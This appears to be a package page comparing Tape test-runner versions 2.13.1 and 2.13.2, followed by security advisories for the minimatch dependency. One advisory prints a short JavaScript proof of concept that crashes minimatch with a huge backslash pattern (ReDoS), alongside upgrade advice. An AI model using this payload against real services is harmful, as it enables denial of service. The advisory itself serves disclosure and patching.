Tape is a simple and powerful JavaScript test runner favored for its straightforward approach to writing and running tests, both in Node.js and browsers. Versions 2.13.1 and 2.13.2 offer similar functionalities, maintaining the core philosophy of producing TAP (Test Anything Protocol) output. Examining the package manifests reveals minimal differences between the two releases. The core dependencies remain consistent, including crucial packages like glob for file pattern matching, through for stream transformations, and deep-equal for robust value comparison. The developer dependencies, such as tap itself and falafel for AST analysis, are also unchanged, suggesting that the internal testing and development tools are not the focus of this update.
The most significant distinction between the two lies in the release date. Version 2.13.2 was published approximately two weeks after 2.13.1. Without specific release notes, which aren't included in the provided data, it's difficult to pinpoint the exact changes. However, given the consistent dependency list, the update likely encompasses minor bug fixes, performance enhancements, or very subtle internal adjustments. Developers using Tape should find the transition between these versions seamless. If you are experiencing specific edge cases or inconsistencies in your test suites, upgrading to the latest minor version (2.13.2) is generally recommended, but considering there are no major dependency updates, the impact of upgrading may be minimal unless directly experiencing issues that have been quietly addressed.
All the vulnerabilities related to the version 2.13.2 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.